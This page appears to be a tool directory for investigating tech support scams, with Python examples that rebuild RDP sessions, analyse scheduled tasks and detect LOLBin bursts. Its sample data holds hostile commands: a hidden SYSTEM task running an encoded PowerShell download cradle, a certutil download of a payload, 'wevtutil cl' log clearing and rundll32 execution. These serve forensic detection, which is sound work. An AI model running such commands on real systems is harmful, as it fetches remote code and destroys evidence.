// case type
tech support scam
pop-up → call center → remote-access install → gift-card / wire payout. evidence is the RDP / RMM tooling artifacts on the endpoint plus the call recording and the payment trail.
start here · primary tools
ordered. work top-down. the first tool is the suggested entry point for this case type.
- remote desktop log clearing and gap detector: drop rdp evtx csvs · detect rdp session log gaps · identify rdp channel clearing · reconstruct rdp sessions and flag the ones with cleared-log indicators · runs locally
- rdp cache parser: drop .bmc/.bin cache files · RDP8 magic or legacy BGRA tiles · thumbnail grid · hide uniform tiles · export zip · runs locally
- live response tool execution artifact detector: drop prefetch shimcache amcache or 4688 evtx csv · detect live response and triage collection tool execution · identify when and how live response was performed · surface kape triage collector and incident response tool artifacts · runs locally
- LOLBin execution burst detector: drop 4688 or sysmon evtx csv · detect living off the land binary execution · identify lolbin abuse patterns · surface unusual lolbin invocations and burst usage · runs locally
- browser history extractor: drop a Chrome or Firefox SQLite history DB · extract URLs · visit counts · timestamps · typed URLs · export CSV · runs locally
- browser extension analyzer: drop Chrome or Firefox extension folder or .crx · parse manifest · permissions · background scripts · content scripts · flag dangerous permissions · export report · runs locally
- chrome extension analyzer: drop crx or manifest.json · permissions audit · content scripts · risk score · script patterns · runs locally
- powershell deobfuscator: paste obfuscated powershell · base64 utf-16 · deflate gzip · concat replace · char arrays · multi-pass · iocs · runs locally
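what the entry-point tool above is actually doing, as an added worked example (this is illustration code written for this page, not the site's tool): take an event export, rebuild RDP sessions from Security 4624 logons with logon type 10 and the TerminalServices-LocalSessionManager 21/23 session events, and use the System 104 "log file was cleared" audit events to explain why a logon has no matching session record. the csv columns, the constructed rows and the indicator names are this example's own assumptions; the event ids are the standard Windows ones.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample export, one event per row (not a real EvtxECmd dump).
#   Security 4624 + logon_type 10 = RemoteInteractive (RDP) logon
#   LSM 21 / 23 = Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
#                 session logon / logoff
#   System 104  = "the <channel> log file was cleared" (Security 1102 is the
#                 equivalent for the Security log itself)
# The scam-day logon survives in Security, but the LSM channel was cleared at
# 15:55 that day, so no LSM session record exists for it.
LSM_CHANNEL = "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
SAMPLE_CSV = """time,channel,event_id,user,source_ip,logon_type,session_id,detail
2024-03-04T14:02:11,Security,4624,VICTIM\\alice,203.0.113.9,10,,
2024-03-04T15:55:12,System,104,VICTIM\\alice,,,,Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
2024-03-05T09:00:00,Security,4624,VICTIM\\alice,10.0.0.5,10,,
2024-03-05T09:00:01,LSM,21,VICTIM\\alice,10.0.0.5,,3,
2024-03-05T09:30:00,LSM,23,VICTIM\\alice,10.0.0.5,,3,
"""


def parse_rows(text):
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["time"] = datetime.fromisoformat(r["time"])
    return sorted(rows, key=lambda r: r["time"])


def log_clears(rows):
    """Audit events that record a log being cleared, with the channel named."""
    clears = []
    for r in rows:
        if r["channel"] == "Security" and r["event_id"] == "1102":
            clears.append({"time": r["time"], "channel": "Security", "by": r["user"]})
        elif r["channel"] == "System" and r["event_id"] == "104":
            clears.append({"time": r["time"], "channel": r["detail"], "by": r["user"]})
    return clears


def reconstruct_sessions(text, tolerance=timedelta(minutes=5)):
    rows = parse_rows(text)
    clears = log_clears(rows)
    lsm_starts = [r for r in rows if r["channel"] == "LSM" and r["event_id"] == "21"]
    lsm_ends = [r for r in rows if r["channel"] == "LSM" and r["event_id"] == "23"]
    sessions = []
    for r in rows:
        if not (r["channel"] == "Security" and r["event_id"] == "4624"
                and r["logon_type"] == "10"):
            continue
        # An LSM 21 from the same source within the tolerance corroborates the logon.
        start = next((s for s in lsm_starts if s["source_ip"] == r["source_ip"]
                      and abs(s["time"] - r["time"]) <= tolerance), None)
        end = None
        if start is not None:
            end = next((e["time"] for e in lsm_ends
                        if e["session_id"] == start["session_id"]
                        and e["time"] > start["time"]), None)
        # A clear of the LSM channel after the logon explains a missing record.
        cleared_at = next((c["time"] for c in clears
                           if c["time"] > r["time"] and c["channel"] == LSM_CHANNEL), None)
        if start is not None:
            indicator = "corroborated"
        elif cleared_at is not None:
            indicator = "lsm_channel_cleared_after_logon"
        else:
            indicator = "no_lsm_record"
        sessions.append({
            "start": r["time"].isoformat(), "user": r["user"], "source_ip": r["source_ip"],
            "end": end.isoformat() if end else None,
            "indicator": indicator,
            "cleared_at": cleared_at.isoformat() if cleared_at else None,
        })
    return sessions


def channel_gap(text, channel_name=LSM_CHANNEL, channel_tag="LSM"):
    """Earliest surviving event in a channel vs. when it was last cleared."""
    rows = parse_rows(text)
    clear_times = [c["time"] for c in log_clears(rows) if c["channel"] == channel_name]
    surviving = [r["time"] for r in rows if r["channel"] == channel_tag]
    if not clear_times:
        return None
    return {
        "cleared_at": max(clear_times).isoformat(),
        "first_surviving_event": min(surviving).isoformat() if surviving else None,
    }


if __name__ == "__main__":
    for s in reconstruct_sessions(SAMPLE_CSV):
        print(s)
    print(channel_gap(SAMPLE_CSV))
```

the point of the cross-check is that a scammer who runs `wevtutil cl` on the TerminalServices channel removes the session record but not the 104 audit event in System, and usually not the Security 4624; the logon without a session record plus the later clear is the indicator, not either one alone.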
also useful · secondary tools
supporting and follow-up tools. surface as the investigation widens.
- PowerShell history clearing detector: drop powershell operational evtx csv or psreadline history file · detect cleared powershell command history · identify gaps in command execution record · surface anti-forensic powershell history manipulation · runs locally
- psreadline history gap and anomaly analyzer: paste or drop psreadline consolehost_history txt · detect gaps in command history · identify suspicious command sequences · surface anti-forensic commands · reconstruct powershell session timeline · runs locally
- windows scheduled task analyzer: drop task scheduler xml · triggers · actions · principals · suspicion score · encoded powershell decode · persistence hints · runs locally
- case report generator: fill in case number · examiner · dates · findings · drop evidence files for auto hash · generates structured forensic report PDF · runs locally
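the scheduled task analyzer in one function, as an added example written for this page (not the site's code): parse the task XML the way it sits on disk (UTF-16 with a BOM, under the mit/task namespace), pull triggers, principal, hidden flag and the Exec action, decode a `-EncodedCommand` argument (base64 over UTF-16LE), and score it. the sample task, the payload, the documentation-range URL and the score weights are all this example's own assumptions.

```python
import base64
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = re.compile(
    r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?$", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(
    r"(IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|FromBase64String)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def encode_command(cmd: str) -> str:
    """Build what -EncodedCommand expects: base64 over the UTF-16LE text."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()


def decode_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16le")


# Constructed sample task (not from a real case). The URL is a documentation
# address. Windows stores task XML as UTF-16 with a BOM, so the sample is too.
PAYLOAD_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/support.ps1')"
SAMPLE_TASK_XML = f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>VICTIM\\alice</Author></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <StartBoundary>2024-03-04T15:50:00</StartBoundary>
      <Repetition><Interval>PT10M</Interval></Repetition>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-nop -w hidden -enc {encode_command(PAYLOAD_CMD)}</Arguments>
    </Exec>
  </Actions>
</Task>
""".encode("utf-16")


def analyze_task(xml_bytes: bytes) -> dict:
    # Decode by BOM, then drop the declaration so the parser sees plain text.
    if xml_bytes[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = xml_bytes.decode("utf-16")
    else:
        text = xml_bytes.decode("utf-8-sig")
    root = ET.fromstring(XML_DECL.sub("", text, count=1))

    def field(path):
        el = root.find(path, TASK_NS)
        return (el.text or "").strip() if el is not None else ""

    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [c.tag.split("}")[-1] for c in triggers_el] if triggers_el is not None else []
    repeats = bool(root.findall(".//t:Repetition/t:Interval", TASK_NS))
    user_id = field("t:Principals/t:Principal/t:UserId")
    run_level = field("t:Principals/t:Principal/t:RunLevel")
    hidden = field("t:Settings/t:Hidden").lower() == "true"
    command = field("t:Actions/t:Exec/t:Command")
    arguments = field("t:Actions/t:Exec/t:Arguments")

    findings = []  # (points, reason); the weights are this example's, not a standard
    if user_id == "S-1-5-18" or run_level == "HighestAvailable":
        findings.append((2, "runs as SYSTEM or with highest privileges"))
    if hidden:
        findings.append((2, "hidden task"))
    if SCRIPT_HOSTS.search(command):
        findings.append((2, f"script host action: {command}"))
    if "LogonTrigger" in triggers:
        findings.append((1, "logon trigger (persistence)"))
    if repeats:
        findings.append((1, "repeating trigger"))
    decoded = ""
    m = ENC_ARG.search(arguments)
    if m:
        decoded = decode_command(m.group(1))
        findings.append((3, "encoded PowerShell argument"))
    payload = decoded or arguments
    if CRADLE.search(payload):
        findings.append((3, "download/execute cradle in payload"))
    return {
        "author": field("t:RegistrationInfo/t:Author"),
        "principal": user_id, "run_level": run_level, "hidden": hidden,
        "triggers": triggers, "command": command, "arguments": arguments,
        "decoded_command": decoded, "urls": URL_RE.findall(payload),
        "score": sum(p for p, _ in findings), "reasons": [r for _, r in findings],
    }


if __name__ == "__main__":
    print(analyze_task(SAMPLE_TASK_XML))
```

the URLs come out of the decoded payload, not the raw Arguments field, which is the part a keyword search over the XML misses; hand them to the browser history and 4688 checks as IOCs.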
run as a stack
skip the click-through. these presets are curated forensic pipelines you can save as a stack with one click and run on your evidence locally.
tech support scam — triage kit
8 steps: drop RDP / RMM logs + browser history → remote-access clearing detect → lolbin burst → PS deobfuscate → report
- 01 evidence-manifest-generator: hash endpoint exports before triage
- 02 remote-desktop-log-clearing-detector: detect RDP log clearing — common post-scam cleanup
- 03 rdp-cache-parser: parse RDP bitmap cache for remote session evidence
- 04 live-response-tool-execution-detector: detect RMM / live-response tool execution artifacts
- 05 lolbin-execution-burst-detector: flag lolbin execution bursts during the scam session window
- 06 powershell-deobfuscator: deobfuscate PowerShell payloads dropped by the scammer
- 07 browser-history-clearing-pattern-detector: detect browser history clearing after the remote session
- 08 case-report-generator: draft a report documenting remote-access evidence + cleanup indicators
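step 05 of the stack, as an added example written for this page (not the site's tool): a sliding-window burst detector over a 4688 process-creation export, restricted to the RDP session span so a burst is tied to the remote-access window, and flagging the anti-forensic commands (wevtutil cl, Clear-EventLog, history removal) inside the burst. the column names, the constructed rows, the LOLBin list and the 2-minute / 3-launch thresholds are this example's assumptions.

```python
import csv
import io
import ntpath  # splits Windows paths correctly even when run on Linux/macOS
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Binaries this example treats as living-off-the-land hosts; extend per case.
LOLBINS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
    "msiexec.exe", "wevtutil.exe", "schtasks.exe", "reg.exe", "wmic.exe",
}
ANTI_FORENSIC = re.compile(
    r"(wevtutil\s+cl\b|Clear-EventLog|Clear-History|ConsoleHost_history)", re.I)

# Constructed 4688 export (columns are this example's own, not a product schema).
# The scam session runs 14:00-15:00 on 2024-03-04; the next-day rows are noise.
SAMPLE_4688 = """time,user,new_process,parent_process,command_line
2024-03-04T14:05:02,VICTIM\\alice,C:\\Windows\\System32\\cmd.exe,C:\\Windows\\explorer.exe,cmd.exe
2024-03-04T14:05:30,VICTIM\\alice,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,C:\\Windows\\System32\\cmd.exe,powershell -nop -w hidden -enc SQBFAFgA
2024-03-04T14:05:41,VICTIM\\alice,C:\\Windows\\System32\\certutil.exe,C:\\Windows\\System32\\cmd.exe,certutil -urlcache -split -f http://198.51.100.7/sv.exe C:\\Users\\Public\\sv.exe
2024-03-04T14:06:10,VICTIM\\alice,C:\\Windows\\System32\\wevtutil.exe,C:\\Windows\\System32\\cmd.exe,wevtutil cl Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
2024-03-04T14:06:15,VICTIM\\alice,C:\\Windows\\System32\\rundll32.exe,C:\\Windows\\System32\\cmd.exe,rundll32 C:\\Users\\Public\\sv.dll#Run
2024-03-04T16:20:00,VICTIM\\alice,C:\\Windows\\System32\\notepad.exe,C:\\Windows\\explorer.exe,notepad.exe
2024-03-05T09:12:00,VICTIM\\alice,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,C:\\Windows\\explorer.exe,powershell
"""


def parse_4688(text):
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["time"] = datetime.fromisoformat(r["time"])
        r["image"] = ntpath.basename(r["new_process"]).lower()
    return sorted(rows, key=lambda r: r["time"])


def detect_bursts(text, window=timedelta(minutes=2), threshold=3, session_window=None):
    """Clusters of >= threshold LOLBin launches by one user within `window`.

    session_window=(start, end) restricts the search to an RDP session span
    (ISO strings or datetimes). The window is anchored at the first launch of
    a cluster, so a long run is reported as consecutive bursts, not merged.
    """
    rows = parse_4688(text)
    if session_window:
        lo, hi = (datetime.fromisoformat(x) if isinstance(x, str) else x
                  for x in session_window)
        rows = [r for r in rows if lo <= r["time"] <= hi]
    by_user = defaultdict(list)
    for r in rows:
        if r["image"] in LOLBINS:
            by_user[r["user"]].append(r)
    bursts = []
    for user, evs in by_user.items():
        i = 0
        while i < len(evs):
            j = i
            while j + 1 < len(evs) and evs[j + 1]["time"] - evs[i]["time"] <= window:
                j += 1
            if j - i + 1 >= threshold:
                chunk = evs[i:j + 1]
                bursts.append({
                    "user": user,
                    "start": chunk[0]["time"].isoformat(),
                    "end": chunk[-1]["time"].isoformat(),
                    "count": len(chunk),
                    "binaries": sorted({r["image"] for r in chunk}),
                    "anti_forensic": [r["command_line"] for r in chunk
                                      if ANTI_FORENSIC.search(r["command_line"])],
                })
                i = j + 1
            else:
                i += 1
    return bursts


if __name__ == "__main__":
    for b in detect_bursts(SAMPLE_4688, session_window=("2024-03-04T14:00:00",
                                                        "2024-03-04T15:00:00")):
        print(b)
```

a single powershell launch is not interesting; cmd → encoded powershell → certutil download → wevtutil clear → rundll32 inside 75 seconds of an RDP session is, and the wevtutil line is the one to carry into step 02 as the cause of the cleared channel.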